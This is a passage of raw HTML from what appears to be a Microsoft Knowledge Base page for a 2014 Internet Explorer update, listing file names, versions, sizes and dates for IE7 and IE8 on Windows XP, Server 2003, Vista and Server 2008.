class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">6,022,144</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,216,000</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">293,168</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:54</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">23,040</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">479,232</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">459,776</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,019,904</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,511,232</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">252,928</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">718,848</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,358,272</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,539,072</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">502,272</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">31,744</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">56,832</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">742,912</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">9,349,632</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">98,304</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,062,912</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">243,712</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">108,032</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,494,016</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,028,096</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,151,488</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wlicmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">6,022,144</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,216,000</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wxpshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:48</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div></div><br/></span></div></div></div></div><h2></h2><div class=\"kb-summary-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Windows Vista and Windows Server 2008 file information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\"><span class=\"text-base\">Version</span></th><th class=\"sbody-th\"><span class=\"text-base\">Product</span></th><th class=\"sbody-th\"><span class=\"text-base\">Milestone</span></th><th class=\"sbody-th\"><span class=\"text-base\">Service branch</span></th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>. <span class=\"text-base\">23</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li></ul><span class=\"text-base\">Note</span> The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><h3 class=\"sbody-h3\">Internet Explorer 7</h3><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">1,177,600</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">1,178,624</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">19,456</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">834,048</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:39</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">842,240</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">26-Sep-2013</td><td class=\"sbody-td\">12:35</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-May-2013</td><td class=\"sbody-td\">17:09</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">09:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6002.23330</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">19-Feb-2014</td><td class=\"sbody-td\">10:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6002.19041</td><td 